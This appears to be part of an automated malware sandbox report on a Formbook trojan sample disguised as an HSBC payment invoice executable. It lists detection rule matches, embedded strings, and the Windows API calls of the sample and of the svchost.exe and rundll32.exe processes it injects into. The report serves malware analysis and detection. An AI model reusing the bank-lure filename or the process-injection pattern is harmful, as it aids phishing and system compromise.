            Source: 00000002.00000002.1520805638.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.3725564617.0000000003010000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1521716208.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: This is a third-party compiled AutoIt script.0_2_00E83B4C
            Source: HSBCscancopy-invoice778483-payment87476MT103.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: HSBCscancopy-invoice778483-payment87476MT103.exe, 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_1454b69c-e
            Source: HSBCscancopy-invoice778483-payment87476MT103.exe, 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_360f294a-f
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: HSBCscancopy-invoice778483-payment87476MT103.exe
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00E83633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,0_2_00E83633
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0C27C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,0_2_00F0C27C
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0C220 NtdllDialogWndProc_W,0_2_00F0C220
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0C49C PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,0_2_00F0C49C
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0C788 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,0_2_00F0C788
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0C8EE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,0_2_00F0C8EE
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0C86D SendMessageW,NtdllDialogWndProc_W,0_2_00F0C86D
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0CBF9 NtdllDialogWndProc_W,0_2_00F0CBF9
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0CBAE NtdllDialogWndProc_W,0_2_00F0CBAE
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0CB7F NtdllDialogWndProc_W,0_2_00F0CB7F
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0CB50 NtdllDialogWndProc_W,0_2_00F0CB50
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0CC2E ClientToScreen,NtdllDialogWndProc_W,0_2_00F0CC2E
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0CDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00F0CDAC
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0CD6C GetWindowLongW,NtdllDialogWndProc_W,0_2_00F0CD6C
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00E81287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,745CC8D0,NtdllDialogWndProc_W,0_2_00E81287
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00E81290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,0_2_00E81290
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00E816DE GetParent,NtdllDialogWndProc_W,0_2_00E816DE
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0D6C6 NtdllDialogWndProc_W,0_2_00F0D6C6
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00E816B5 NtdllDialogWndProc_W,0_2_00E816B5
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00E8167D NtdllDialogWndProc_W,0_2_00E8167D
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0D74C GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,0_2_00F0D74C
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00E8189B NtdllDialogWndProc_W,0_2_00E8189B
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0DA9A NtdllDialogWndProc_W,0_2_00F0DA9A
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0BF4D NtdllDialogWndProc_W,CallWindowProcW,0_2_00F0BF4D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042B873 NtClose,2_2_0042B873
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72B60 NtClose,LdrInitializeThunk,2_2_03D72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03D72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D735C0 NtCreateMutant,LdrInitializeThunk,2_2_03D735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D74340 NtSetContextThread,2_2_03D74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D74650 NtSuspendThread,2_2_03D74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72BF0 NtAllocateVirtualMemory,2_2_03D72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72BE0 NtQueryValueKey,2_2_03D72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72B80 NtQueryInformationFile,2_2_03D72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72BA0 NtEnumerateValueKey,2_2_03D72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72AD0 NtReadFile,2_2_03D72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72AF0 NtWriteFile,2_2_03D72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72AB0 NtWaitForSingleObject,2_2_03D72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72FE0 NtCreateFile,2_2_03D72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72F90 NtProtectVirtualMemory,2_2_03D72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72FB0 NtResumeThread,2_2_03D72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72FA0 NtQuerySection,2_2_03D72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72F60 NtCreateProcessEx,2_2_03D72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72F30 NtCreateSection,2_2_03D72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72EE0 NtQueueApcThread,2_2_03D72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72E80 NtReadVirtualMemory,2_2_03D72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72EA0 NtAdjustPrivilegesToken,2_2_03D72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72E30 NtWriteVirtualMemory,2_2_03D72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72DD0 NtDelayExecution,2_2_03D72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72DB0 NtEnumerateKey,2_2_03D72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72D10 NtMapViewOfSection,2_2_03D72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72D00 NtSetInformationFile,2_2_03D72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72D30 NtUnmapViewOfSection,2_2_03D72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72CC0 NtQueryVirtualMemory,2_2_03D72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72CF0 NtOpenProcess,2_2_03D72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72CA0 NtQueryInformationToken,2_2_03D72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72C70 NtFreeVirtualMemory,2_2_03D72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72C60 NtCreateKey,2_2_03D72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D72C00 NtQueryInformationProcess,2_2_03D72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D73090 NtSetValueKey,2_2_03D73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D73010 NtOpenDirectoryObject,2_2_03D73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D739B0 NtGetContextThread,2_2_03D739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D73D70 NtOpenThread,2_2_03D73D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D73D10 NtOpenProcessToken,2_2_03D73D10
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04904650 NtSuspendThread,LdrInitializeThunk,11_2_04904650
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04904340 NtSetContextThread,LdrInitializeThunk,11_2_04904340
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902CA0 NtQueryInformationToken,LdrInitializeThunk,11_2_04902CA0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_04902C70
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902C60 NtCreateKey,LdrInitializeThunk,11_2_04902C60
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902DD0 NtDelayExecution,LdrInitializeThunk,11_2_04902DD0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_04902DF0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902D10 NtMapViewOfSection,LdrInitializeThunk,11_2_04902D10
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902D30 NtUnmapViewOfSection,LdrInitializeThunk,11_2_04902D30
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902E80 NtReadVirtualMemory,LdrInitializeThunk,11_2_04902E80
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902EE0 NtQueueApcThread,LdrInitializeThunk,11_2_04902EE0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902FB0 NtResumeThread,LdrInitializeThunk,11_2_04902FB0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902FE0 NtCreateFile,LdrInitializeThunk,11_2_04902FE0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902F30 NtCreateSection,LdrInitializeThunk,11_2_04902F30
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902AD0 NtReadFile,LdrInitializeThunk,11_2_04902AD0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902AF0 NtWriteFile,LdrInitializeThunk,11_2_04902AF0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902BA0 NtEnumerateValueKey,LdrInitializeThunk,11_2_04902BA0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902BF0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_04902BF0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902BE0 NtQueryValueKey,LdrInitializeThunk,11_2_04902BE0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902B60 NtClose,LdrInitializeThunk,11_2_04902B60
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_049035C0 NtCreateMutant,LdrInitializeThunk,11_2_049035C0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_049039B0 NtGetContextThread,LdrInitializeThunk,11_2_049039B0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902CC0 NtQueryVirtualMemory,11_2_04902CC0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902CF0 NtOpenProcess,11_2_04902CF0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902C00 NtQueryInformationProcess,11_2_04902C00
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902DB0 NtEnumerateKey,11_2_04902DB0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902D00 NtSetInformationFile,11_2_04902D00
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902EA0 NtAdjustPrivilegesToken,11_2_04902EA0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902E30 NtWriteVirtualMemory,11_2_04902E30
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902F90 NtProtectVirtualMemory,11_2_04902F90
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902FA0 NtQuerySection,11_2_04902FA0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902F60 NtCreateProcessEx,11_2_04902F60
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902AB0 NtWaitForSingleObject,11_2_04902AB0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04902B80 NtQueryInformationFile,11_2_04902B80
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04903090 NtSetValueKey,11_2_04903090
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04903010 NtOpenDirectoryObject,11_2_04903010
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04903D10 NtOpenProcessToken,11_2_04903D10
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04903D70 NtOpenThread,11_2_04903D70
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_027D8270 NtDeleteFile,11_2_027D8270
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_027D8310 NtClose,11_2_027D8310
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_027D8030 NtCreateFile,11_2_027D8030
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_027D8190 NtReadFile,11_2_027D8190
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_027D8470 NtAllocateVirtualMemory,11_2_027D8470
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EE40B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_00EE40B1
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00ED8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,746E5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,0_2_00ED8858
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EE545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00EE545F
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00E8E8000_2_00E8E800
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EADBB50_2_00EADBB5
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00E8E0600_2_00E8E060
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0804A0_2_00F0804A
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00E941400_2_00E94140
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EA24050_2_00EA2405
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EB65220_2_00EB6522
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EB267E0_2_00EB267E
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F006650_2_00F00665
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00E968430_2_00E96843
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EA283A0_2_00EA283A
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EB89DF0_2_00EB89DF
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F00AE20_2_00F00AE2
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EB6A940_2_00EB6A94
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00E98A0E0_2_00E98A0E
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EDEB070_2_00EDEB07
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EE8B130_2_00EE8B13
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EACD610_2_00EACD61
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EB70060_2_00EB7006
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00E931900_2_00E93190
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00E9710E0_2_00E9710E
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00E812870_2_00E81287
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EA33C70_2_00EA33C7
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EAF4190_2_00EAF419
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EA16C40_2_00EA16C4
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00E958C00_2_00E958C0
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EA78D30_2_00EA78D3
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EA1BB80_2_00EA1BB8
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EB9D050_2_00EB9D05
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00E8FE400_2_00E8FE40
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EABFE60_2_00EABFE6
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EA1FD00_2_00EA1FD0
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00E236600_2_00E23660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004028C02_2_004028C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004028BD2_2_004028BD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011C02_2_004011C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401A402_2_00401A40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004032F02_2_004032F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401BF02_2_00401BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041039B2_2_0041039B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004103A32_2_004103A3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042DCC32_2_0042DCC3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416D0E2_2_00416D0E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416D132_2_00416D13
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004105C32_2_004105C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402DE02_2_00402DE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E6432_2_0040E643
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026002_2_00402600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03E003E62_2_03E003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D4E3F02_2_03D4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DFA3522_2_03DFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DC02C02_2_03DC02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DE02742_2_03DE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DF81CC2_2_03DF81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03E001AA2_2_03E001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DF41A22_2_03DF41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DC81582_2_03DC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DDA1182_2_03DDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D301002_2_03D30100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DD20002_2_03DD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3C7C02_2_03D3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D647502_2_03D64750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D407702_2_03D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5C6E02_2_03D5C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03E005912_2_03E00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D405352_2_03D40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DEE4F62_2_03DEE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DF24462_2_03DF2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DE44202_2_03DE4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DF6BD72_2_03DF6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DFAB402_2_03DFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3EA802_2_03D3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03E0A9A62_2_03E0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D429A02_2_03D429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D569622_2_03D56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6E8F02_2_03D6E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D268B82_2_03D268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D4A8402_2_03D4A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D428402_2_03D42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D32FC82_2_03D32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D4CFE02_2_03D4CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DBEFA02_2_03DBEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB4F402_2_03DB4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D60F302_2_03D60F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DE2F302_2_03DE2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D82F282_2_03D82F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DFEEDB2_2_03DFEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D52E902_2_03D52E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DFCE932_2_03DFCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D40E592_2_03D40E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DFEE262_2_03DFEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D3ADE02_2_03D3ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D58DBF2_2_03D58DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DDCD1F2_2_03DDCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D4AD002_2_03D4AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D30CF22_2_03D30CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DE0CB52_2_03DE0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D40C002_2_03D40C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D8739A2_2_03D8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D2D34C2_2_03D2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DF132D2_2_03DF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5B2C02_2_03D5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DE12ED2_2_03DE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D452A02_2_03D452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D4B1B02_2_03D4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03E0B16B2_2_03E0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D2F1722_2_03D2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D7516C2_2_03D7516C
